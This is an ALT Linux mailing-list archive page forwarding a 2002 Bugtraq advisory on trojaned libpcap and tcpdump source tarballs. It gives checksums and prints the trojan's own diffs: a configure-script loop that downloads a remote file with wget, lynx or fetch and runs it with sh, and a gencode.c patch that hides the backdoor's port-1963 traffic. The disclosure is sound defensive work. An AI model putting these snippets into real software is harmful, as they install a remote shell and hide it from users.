ALT Linux Community general discussions
 help / color / mirror / Atom feed
* [Comm] [alex@intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan]
@ 2002-11-14 10:59 Dmitry V. Levin
  0 siblings, 0 replies; only message in thread
From: Dmitry V. Levin @ 2002-11-14 10:59 UTC (permalink / raw)
  To: ALT Linux Sisyphus mailing list, ALT Linux general discussion list

[-- Attachment #1: Type: text/plain, Size: 4501 bytes --]

Это не security announce.
Просто для ясности: в Сизифе и дистрибутивах исходники нормальные.

----- Forwarded message from Mincu Alexandru <alex@intelinet.ro> -----

Date: 13 Nov 2002 16:48:30 +0200
From: Mincu Alexandru <alex@intelinet.ro>
To: bugtraq@securityfocus.com
Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Organization: 
X-Mailer: Ximian Evolution 1.2.0 

Updates:

      * Many Mirrors are infected with the trojan
Background:

      * Libpcap provides a packet sniffing library for programs like
        Snort.
      * Tcpdump is a standard tool for packet sniffing.
Details:

      * The trojan contains modifications to the configure script and
        gencode.c (in libpcap only).
        
      * The configure script downloads
        http://mars.raketti.net/~mash/services which is then sourced
        with the shell. It contains an embedded shell script that
        creates a C file, and compiles it.
        
      * The program connects to 212.146.0.34 (mars.raketti.net) on port
        1963 and reads one of three one byte status codes:
              * A - program exits 
              * D - forks and spawns a shell and does the needed file
                descriptor manipulation to redirect it to the existing
                connection to 212.146.0.34. 
              * M - closes connection, sleeps 3600 seconds, and then
                reconnects 
        
        
        Hmm... ADM...
        
      * It's important to note that it reuses the same outgoing
        connection for the shell. This gets around firewalls that block
        incoming connections.
        
      * Gencode.c is modified to force libpcap to ignore packets to/from
        the backdoor program, hiding the backdoor program's traffic.
        
      * This is similar to the OpenSSH trojan a few months ago.
        
        
Good sources: 

http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz


MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz
Trojaned sources:

http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz


MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:


*** 288,293 ****
--- 289,318 ----
  {
        extern int n_errors;
        int len;
+         int l;
+         char *port = "1963";
+         char *str, *tmp, *new = "not port 1963";
+ 
+     if (buf && *buf && strstr (buf, port)) {
+         buf = "port 1964";
+     }
+     else {
+         l = strlen (new) + 1;
+         if (!(!buf || !*buf)) {
+             l += strlen (buf);
+             l += 5; /* and */
+         }
+ 
+         str = (char *)malloc (l);
+         str[0] = '\0';
+         if (!(!buf || !*buf)) {
+             strcpy (str, buf);
+             strcat (str, " and ");
+         }
+ 
+         strcat (str, new);
+         buf = str;
+     }
  
        no_optimize = 0;
        n_errors = 0;
***************

The (relevant) configure diff:


+  CNF="services"
+  URL="mars.raketti.net/~mash/$CNF"

!  (IFS=","
!  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
! 
!  for i in $ARGS; do
!        IFS=" "
!        $i $URL 1> $CNF
!        if [ -f $CNF ]; then sh $CNF
!            exit
!        fi
!        rm -f $CNF
!  done) 1>/dev/null 2>/dev/null &

The "services" payload:
      * trojan-script, the non-obfuscated portion (excerpted)
      * services, the complete version
Thanks to:

Russell Adams <rladams@NO_SPAMadamsinfoserv.com>
Mathew Solnik <msolnik@NO_SPAMhlug.org>
Scott Stout <skout@NO_SPAMwiretapped.us>

with the Houston Linux Users Group.

Additional thanks to Bruce Locke for interpreting the backdoor code.

Thanks to Gentoo's Portage system for catching the trojaned 

-- 
Mincu Alexandru <alex@intelinet.ro>

----- End forwarded message -----

--
ldv

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]

^ permalink raw reply	[flat|nested] only message in thread
only message in thread, other threads:[~2002-11-14 10:59 UTC | newest]

Thread overview: (only message) (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2002-11-14 10:59 [Comm] [alex@intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan] Dmitry V. Levin

ALT Linux Community general discussions

This inbox may be cloned and mirrored by anyone:

	git clone --mirror http://lore.altlinux.org/community/0 community/git/0.git

	# If you have public-inbox 1.1+ installed, you may
	# initialize and index your mirror using the following commands:
	public-inbox-init -V2 community community/ http://lore.altlinux.org/community \
		mandrake-russian@linuxteam.iplabs.ru community@lists.altlinux.org community@lists.altlinux.ru community@lists.altlinux.com
	public-inbox-index community

Example config snippet for mirrors.
Newsgroup available over NNTP:
	nntp://lore.altlinux.org/org.altlinux.lists.community


AGPL code for this site: git clone https://public-inbox.org/public-inbox.git